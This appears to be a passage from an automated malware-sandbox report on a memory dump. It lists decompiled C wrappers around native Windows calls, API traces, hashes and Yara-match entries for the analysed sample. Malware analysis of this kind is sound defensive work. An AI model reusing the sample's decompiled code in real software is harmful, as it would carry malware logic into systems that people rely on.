                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E004181C0(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
				void* _v3;
				intOrPtr _t15;
				signed char _t16;
				long _t21;
				long _t23;
				void* _t31;
				long _t33;

				_t15 = _a4;
				_t23 =  *(_t15 + 0x10);
				_t3 = _t15 + 0xc40; // 0xc40
				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
				asm("adc al, 0x52");
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t33); // executed
				return _t21;
			}










                                                                                                                                                                                                          0x004181c3
                                                                                                                                                                                                          0x004181c6
                                                                                                                                                                                                          0x004181cf
                                                                                                                                                                                                          0x004181d7
                                                                                                                                                                                                          0x004181e1
                                                                                                                                                                                                          0x004181e7
                                                                                                                                                                                                          0x0041820d
                                                                                                                                                                                                          0x00418211

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E004181BA(void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, void* _a48) {
				void* _v3;
				intOrPtr _t15;
				signed char _t16;
				long _t21;
				long _t23;
				void* _t31;
				long _t36;
				long _t39;

				asm("adc esp, [edi+eax*8+0x55749e0c]");
				_t36 = _t39;
				_t15 = _a4;
				_t23 =  *(_t15 + 0x10);
				_t3 = _t15 + 0xc40; // 0xc40
				_t16 = E00418DC0(_t31, _t15, _t3, _t23, 0, 0x28);
				 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ _t23;
				asm("adc al, 0x52");
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t23, _t16 ^ 0x0000008b, _t36); // executed
				return _t21;
			}











                                                                                                                                                                                                          0x004181ba
                                                                                                                                                                                                          0x004181c1
                                                                                                                                                                                                          0x004181c3
                                                                                                                                                                                                          0x004181c6
                                                                                                                                                                                                          0x004181cf
                                                                                                                                                                                                          0x004181d7
                                                                                                                                                                                                          0x004181e1
                                                                                                                                                                                                          0x004181e7
                                                                                                                                                                                                          0x0041820d
                                                                                                                                                                                                          0x00418211

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                                                                                                                                          • Instruction ID: fae6ffa33bf77168ea0cd424f9f4fd6a4ef7e0647b005e22d2a95e62c3cf46de
                                                                                                                                                                                                          • Opcode Fuzzy Hash: edcc572d20d658b09244c3f101f520ca345bd06ac2fcb3511e7a9f272df0d7fc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E01A4B2211108ABCB48CF89DC95DEB77A9EF8C754F158248FA1997241D630E8518BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                                                                          0x004183af
                                                                                                                                                                                                          0x004183b7
                                                                                                                                                                                                          0x004183d9
                                                                                                                                                                                                          0x004183dd

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E004182F0(void* __esi, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8);
				asm("rcr byte [esi+0x5d], 1");
				return _t8;
			}





                                                                                                                                                                                                          0x004182f3
                                                                                                                                                                                                          0x004182f6
                                                                                                                                                                                                          0x004182ff
                                                                                                                                                                                                          0x00418307
                                                                                                                                                                                                          0x00418315
                                                                                                                                                                                                          0x00418316
                                                                                                                                                                                                          0x00418319

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
